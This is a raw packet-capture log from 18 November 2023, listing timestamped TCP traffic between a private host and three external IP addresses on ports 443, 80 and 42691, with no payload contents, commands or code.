Nov 18, 2023 10:02:34.199314117 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.199373960 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.200020075 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.200083017 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.200927019 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.200995922 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.201709032 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.201755047 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.201769114 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.201780081 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.201812983 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.201838017 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.202640057 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.202708006 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.203475952 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.203550100 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.204230070 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.204302073 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.205164909 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.205214024 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.205270052 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.205284119 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.205311060 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.206020117 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.206075907 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.206089020 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.206798077 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.206844091 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.206852913 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.206865072 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.206897020 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.207703114 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.207762957 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.207775116 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.207828045 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.208540916 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.208636045 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.209204912 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.209270000 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.210071087 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.210134029 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.210891962 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.210949898 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.211745024 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.211791992 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.211805105 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.211816072 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.211841106 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.211864948 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.213392973 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.213466883 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.354661942 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:34.369474888 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.369564056 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.371396065 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.371464968 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.371493101 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.371576071 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.374738932 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.374759912 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.374800920 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.374810934 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.374825954 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.374862909 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.377357960 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.377382040 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.377425909 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.377439976 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.377500057 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.379872084 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.379889965 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.379966974 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.379981041 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.383229971 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.383251905 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.383322954 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.383337021 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.383375883 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.385627031 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.385643959 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.385691881 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.385706902 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.385762930 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.388256073 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.388278008 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.388325930 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.388339043 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.388371944 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.391590118 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.391608000 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.391694069 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.391715050 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.391746044 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.394072056 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.394093990 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.394139051 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.394151926 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.394195080 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.396672010 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.396688938 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.396752119 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.396766901 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.396795988 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.398137093 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.398207903 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.398220062 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.398272991 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.398385048 CET	443	49743	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.398448944 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.398582935 CET	49743	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.420772076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420794010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420813084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420830965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420847893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420861959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.420872927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420890093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420900106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.420908928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.420919895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.420974016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421401024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421418905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421437025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421453953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421471119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421480894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421488047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421504021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421531916 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421540022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421557903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421574116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421593904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421606064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421612024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421628952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421643972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421644926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421679020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421679974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421698093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421724081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421730995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421740055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421756029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421773911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421778917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421791077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421807051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421808004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421823978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421833992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421840906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421858072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421875000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421878099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421891928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421907902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421910048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421924114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421942949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421953917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421958923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421976089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.421979904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.421992064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422004938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422008991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422032118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422044039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422048092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422065020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422080994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422081947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422099113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422116041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422120094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422132015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422149897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422154903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422166109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422175884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422183037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422207117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422223091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422224045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422239065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422255993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422255993 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422287941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422295094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422305107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422322989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422338009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422338963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422355890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422373056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422377110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422389030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422411919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422416925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422429085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422437906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422446012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422463894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422480106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422491074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422496080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422511101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422513008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422528982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422544956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422557116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422560930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422579050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422595024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422602892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422610998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422627926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422643900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422661066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422665119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422665119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422678947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422689915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422696114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.422708035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.422780991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.424643040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.428664923 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.428700924 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.428778887 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.429101944 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:34.429116964 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:34.658023119 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:34.668349981 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:34.719080925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719103098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719120979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719139099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719156981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719175100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719192982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719192982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719216108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719224930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719233990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719271898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719275951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719289064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719305992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719321966 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719324112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719341040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719360113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719360113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719377041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719396114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719428062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719453096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719578028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719594955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719619036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719629049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719638109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719656944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719670057 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719674110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719691992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719705105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719708920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719726086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719743013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719758034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719759941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.719783068 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.719808102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.720204115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720267057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720285892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720303059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720335007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.720376015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.720607996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720832109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720849037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720868111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720885038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720901012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720905066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.720918894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720932007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.720937967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720947981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.720956087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720974922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720990896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.720993996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721008062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721024990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721026897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721040964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721059084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721075058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721077919 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721092939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721100092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721110106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721122026 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721128941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721146107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721163034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721173048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721180916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721199036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721216917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721220016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721235037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721237898 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721262932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721273899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721281052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721298933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721314907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721317053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721333981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721350908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721354961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721369028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721383095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721385956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721404076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721421003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721426964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721436024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721455097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:34.721453905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:34.721472025 CET	80	49744	194.49.94.120	192.168.2.4
